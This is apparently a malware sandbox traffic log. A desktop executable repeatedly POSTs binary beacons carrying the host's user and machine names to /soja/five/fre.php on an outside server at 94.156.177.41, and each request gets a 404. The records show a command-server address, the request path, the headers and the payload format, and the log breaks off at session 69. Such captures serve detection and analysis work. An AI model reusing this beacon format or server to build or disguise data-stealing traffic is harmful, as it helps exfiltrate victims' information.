Jan 11, 2025 08:37:59.876507044 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:59.881351948 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:00.754713058 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.9	50028	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:00.918942928 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:00.923865080 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:01.623123884 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.9	50029	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:01.796801090 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:01.801641941 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:02.493860006 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.9	50030	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:02.924700975 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:02.929553986 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:03.624018908 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.9	50031	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:03.783593893 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:03.788439989 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:04.490525961 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.9	50032	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:04.649859905 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:04.654751062 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:05.394815922 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.9	50033	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:05.731822014 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:05.736766100 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:06.454509974 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.9	50034	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:06.631606102 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:06.637552977 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:07.370358944 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.9	50035	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:07.538527012 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:07.543493032 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:08.253726959 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.9	50036	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:08.530126095 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:08.535137892 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:09.255610943 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.9	50037	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:09.425780058 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:09.430835962 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:10.138278961 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.9	50038	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:10.292083025 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:10.296977997 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:11.003601074 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.9	50039	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:11.146708965 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:11.151743889 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:11.883033037 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.9	50040	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:12.035147905 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:12.040088892 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:12.777829885 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.9	50041	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:12.944638014 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:12.949662924 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:13.686588049 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.9	50042	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:13.837207079 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:13.842179060 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:14.556322098 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.9	50043	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:14.709022045 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:14.714005947 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:15.572619915 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.9	50044	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:15.722846031 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:15.727832079 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:16.449412107 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.9	50045	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:16.597137928 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:16.602138996 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:17.326540947 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.9	50046	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:17.475481033 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:17.480431080 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:18.199985981 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.9	50047	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:18.357064962 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:18.361970901 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:19.083893061 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.9	50048	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:19.238666058 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:19.243599892 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:19.942995071 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.9	50049	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
